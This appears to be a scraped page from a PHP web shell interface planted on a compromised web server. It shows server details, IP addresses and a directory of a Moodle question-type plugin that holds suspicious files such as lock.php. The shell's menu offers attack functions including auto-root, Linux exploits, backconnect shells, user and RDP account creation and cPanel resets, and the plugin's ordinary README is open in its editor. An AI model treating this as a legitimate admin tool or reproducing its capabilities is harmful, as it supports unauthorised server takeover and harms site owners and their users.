Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.71.254.93
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
question /
type /
combined /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
combinable
[ DIR ]
drwxr-xr-x
combiner
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
README.md
2.07
KB
-rw-r--r--
changes.md
2.74
KB
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
edit_combined_form.php
4.33
KB
-rw-r--r--
lib.php
1.63
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
question.php
9.75
KB
-rw-r--r--
questiontype.php
11.21
KB
-rw-r--r--
renderer.php
8.63
KB
-rw-r--r--
settings.php
2.29
KB
-rw-r--r--
styles.css
4.5
KB
-rw-r--r--
version.php
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Combined question type A combined question type which allows the embedding of the response fields for various available sub-questions in the question text. So the student can enter a numeric or short text answer or choose an answer or answer(s) from using a select box, check boxes or radio boxes. ## Requirements You will need to install at least one question type that can be used as a sub-question, you can use any of the latest versions of these question types as sub-questions: * Select missing words - which is now part of the standard Moodle release. * [Pattern match](https://moodle.org/plugins/qtype_pmatch) * [OU multiple response](https://moodle.org/plugins/qtype_oumultiresponse) - multiple choice with checkboxes. * Standard Moodle multiple-choice with one right choice - multiple choice with radio buttos. * [Variable numeric](https://moodle.org/plugins/qtype_varnumericset) ## Acknowledgements This question type was written by Jamie Pratt (http://jamiep.org/) for the Open University (http://www.open.ac.uk/). Subsequent enhancement have been made by OU staff. ## Installation ### Installation Using from the Moodle plugins directory Works as usual starting here * https://moodle.org/plugins/qtype_combined ### Installation Using Git To install using git type these commands in the root of your Moodle install: git clone https://github.com/moodleou/moodle-qtype_combined.git question/type/combined echo '/question/type/combined/' >> .git/info/exclude Then run the moodle update process Site administration > Notifications ## Making other question types combinable You can make other question types work with this combined question type by adding the directory combinable/ to your question type. See examples of the files which are required in the combinable directory in the question types above. Or for a built in question type or where you don't want to change the code in the other question type plug ins directory you can put the required files in question/type/combined/combinable/{questiontypename}/ See question/type/combined/combinable/README.md for more information.
Close